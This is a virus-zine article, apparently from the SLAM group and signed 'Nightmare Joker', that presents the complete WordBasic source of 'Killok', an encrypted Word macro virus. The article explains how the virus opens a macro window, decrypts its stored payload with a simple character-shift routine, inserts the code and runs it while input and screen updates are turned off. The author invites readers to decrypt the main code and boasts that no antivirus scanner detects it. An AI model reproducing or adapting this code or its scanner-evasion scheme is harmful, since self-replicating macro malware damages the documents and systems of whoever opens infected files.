Copy Link
Add to Bookmark
Report
SLAM2.006: WordMacro Virus Killok by NJ [SLAM]
[ WordMacro. Killok ]---------------
˛ VIRUSNAME: Killok
˛ SIZE: 965 Bytes
˛ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker
->Polymorf No
->Stealth No
->Encrypted Yes
->Retro No
-------------------------------------
Here is it. The new anti-heuristic Word Macro Virus Killok!
If the virus become active then he opens the Macro window "Killok", decrypt the main code (NJ$(x)), insert it and run the macro.
At last close the virus the macro window "Killok" without saving it.
OK, look at the following source code:
-----------------------------------------------------------------------------
Dim Shared NJ$(18)
Sub MAIN
NJ$(1) = "û«÷بí®>ÿ◊êıØ´fiê÷"
NJ$(2) = "∑~z_z «í®˘ØÄ®~,ü"
NJ$(3) = " êfizµz_z<z©êzùêÿ‘◊ «í®÷,ü"
NJ$(4) = "ú∑z «í®÷~, «í®˘ØÄ®~,µüüz-òz||z©∂®‘"
NJ$(5) = " «í®›«÷◊zµ" : DisableInput 'Set DisableInput On
NJ$(6) = "∂~z_z «í®˘ØÄ®~,ü"
NJ$(7) = "ú∑z∑~z-òz∂~z©∂®‘"
NJ$(8) = "ú∑z≠®◊ûê´ÿÄ®‘◊¯Øfi~,|æ«ííêè|üz_z||z©∂®‘"
NJ$(9) = " «í®Ø—®>÷zà êfiÄØ◊z_z<"
NJ$(10) = "z®◊ûê´ÿÄ®‘◊¯Øfiz|zéçéûz|˝z◊fi~,™‘Û,üüz"
NJ$(11) = "ıØ´fiêù꓇z∑~z_z|ò>ÿ◊ê∏“®‘|˝z∂~z_z|ò|˝z<"
NJ$(12) = "®◊ûê´ÿÄ®‘◊¯Øfiz|æ«ííêè|˝z◊fi~,™‘Û,üü"
NJ$(13) = "Y‘Ûzú∑" : ScreenUpdating 'Set ScreenUpdating Off
NJ$(14) = " «í®ùíê÷®z<"
NJ$(15) = "Y‘Ûzú∑" : NJ$ = FileName$() 'NJ$ = file name
NJ$(16) = "Y‘Ûzú∑"
NJ$(17) = "˘®„◊zµ"
NJ$(18) = "û«÷بí®>ÿ◊êıØ´fiê÷zS"
REM Open the Killok macro window.
NJ = 0 : ToolsMacro .Name = "Killok", .Show = 3, .Edit
REM Decrypt now the main virus code.
For a = 1 To 18
For xy = 1 To Len(NJ$(a))
b = Asc(Mid$(NJ$(a), xy, 1))
If c = 255 Then c = 148
c = b - 90
If c < 0 Then c = c + 255
If c = 165 Then c = 58
d$ = d$ + Chr$(c)
Next xy
Insert d$ : InsertPara : d$ = ""
Next a
REM Activate the infected document, run the killok macro,
REM go back to the macro window and close it.
Activate NJ$ : Killok : NextWindow : DocClose 2
REM Set ScreenUpdating On and DisableInput Off
Killok$ = "NJ" : ScreenUpdating : DisableInput 0
End Sub
-----------------------------------------------------------------------------
Try to decrypt the main code! It's easy. :)
BTW, Killok is at the moment undetectable by all AV Scanner.
- Nightmare Joker -
